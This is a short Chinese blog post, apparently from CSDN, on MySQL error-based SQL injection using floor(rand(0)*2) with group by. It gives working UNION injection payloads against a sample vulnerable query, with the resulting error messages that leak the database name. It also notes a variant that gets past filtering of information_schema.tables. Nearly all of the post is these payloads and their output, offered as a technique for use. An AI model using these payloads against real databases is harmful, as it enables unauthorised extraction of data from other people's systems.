mysql floor报错注入新发现

1、 mysql> select 1 ,2,3 from (select count(*),concat(floor(rand(0)*2),database())x from information_schema.tables group by x)c;
ERROR 1062 (23000): Duplicate entry ‘db_mydatebase1’ for key ‘group_key’
//当表存在时

2、 mysql> select count(*),concat(database(),floor(rand(0)*2))x from awd group by x;
ERROR 1146 (42S02): Table ‘db_mydatebase.awd’ doesn’t exist
//当表不存在时 表“awd”是不存在的

2 相对于 1 的好处在于:1、不必在意表的数据有多少,而 2 要在表的数据有三行及三行以上才会生效
2、不需要知道字段数//实际测试 2 也不需要 mysql控制台测试则需要
3、绕过information_schema.tables过滤
4、打的字少(嗯!这点很总要)

测验语句:
select * from test where user=’ ’
1 : union select 1 ,2,3 from (select count(*),concat(floor(rand(0)*2),database())x from information_schema.tables group by x)c;
结果:(Duplicate entry ‘1db_mydatebase’ for key ‘group_key’)//注意1,2,3 是表的字段数,也就是说必须知道表 test 的字段数才可以进行注入)//第二次测试发现
实际测试并不需要知道字段(我设置为 select 1 而不是select 1,2,3)字段数也会爆库,但是在mysql控制台直接测试就会出现The used SELECT statements have a different number of columns求大神解答!

2 :union select count(*) concat(floor(rand(0)*2),database())x from awdawd group by x//事实上 后面一个x也可以乱打
结果: Table ‘db_mydatebase.awdawd’ doesn’t exist

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值